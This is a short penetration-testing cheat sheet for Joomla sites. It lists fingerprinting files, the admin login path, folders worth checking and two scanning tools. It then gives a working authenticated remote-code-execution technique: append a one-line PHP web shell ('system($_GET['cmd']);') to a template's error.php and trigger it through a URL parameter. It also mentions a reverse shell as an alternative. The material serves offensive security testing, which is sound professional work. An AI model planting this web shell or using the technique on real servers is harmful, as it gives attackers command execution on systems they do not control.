Joomla
Standard pages and folders
License files
/readme.txt
/administrator/manifests/files/joomla.xml _
/language/en-GB/en-GB.xml
/plugins/system/cache/cache.xml
Login pages
/administrator
Resource folder
plugins/
plugins/system
templates/
Automatic scan tools
joomscan
droopescan
Authenticated RCE
After obtaining access to the administrative panel it is possible to execute commands on the underlying machine by editing a template page.
Select a template to edit
Append
system($_GET['cmd']);
in the error.php page and saveNavigate to
<host>/templates/<template>/error.php?cmd=<cmd>
It is also possible to append the payload to launch a reverse shell and trigger it by visiting the modified page
Last updated